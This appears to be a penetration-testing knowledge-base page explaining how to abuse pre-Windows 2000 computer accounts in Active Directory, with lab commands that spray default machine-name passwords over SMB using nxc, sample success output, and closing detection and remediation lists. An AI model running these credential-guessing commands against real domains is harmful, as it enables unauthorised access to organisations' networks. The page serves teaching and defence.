Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access / Techniques

Pre 2K Computers

Pre-Windows 2000 compatible computer account abuse targets old or pre-created machine accounts with predictable passwords.

The classic pattern is:

username: COMPUTER$
password: computer

This is not common in hardened environments, but it is a fast check when machine names are known.


Build Computer List

From DNS or scan results:

cat > computers.txt <<'EOF'
OOTW-DC01
OOTW-WS01
OOTW-SRV01
EOF

Normalize:

cat computers.txt | tr '[:lower:]' '[:upper:]' | sort -u > computers-upper.txt

Test Machine Account Defaults

while read c; do
  pass=$(echo "$c" | tr '[:upper:]' '[:lower:]')
  nxc smb 10.10.10.200 -d ootw.local -u "${c}$" -p "$pass" --continue-on-success
done < computers-upper.txt

Example:

nxc smb 10.10.10.200 -d ootw.local -u 'OOTW-WS01$' -p 'ootw-ws01'

Success:

[+] ootw.local\OOTW-WS01$:ootw-ws01

Validate As Machine Account

nxc ldap 10.10.10.200 -d ootw.local -u 'OOTW-WS01$' -p 'ootw-ws01'
nxc smb 10.10.10.200 -d ootw.local -u 'OOTW-WS01$' -p 'ootw-ws01' --shares

Machine accounts end with $. Quote the username so the shell does not treat $ specially.


Detection

Defenders look for:

  • authentication attempts where TargetUserName ends with $
  • failed NTLM or Kerberos logons for many computer accounts
  • successful machine account logon from non-machine source IPs
  • Security 4624, 4625, 4771, and 4776 patterns

Remediation

  • disable or remove stale pre-created computer accounts
  • randomize machine account passwords immediately
  • set ms-DS-MachineAccountQuota to 0 where appropriate
  • monitor machine account logons from unexpected hosts
  • do not leave prestaged machines unused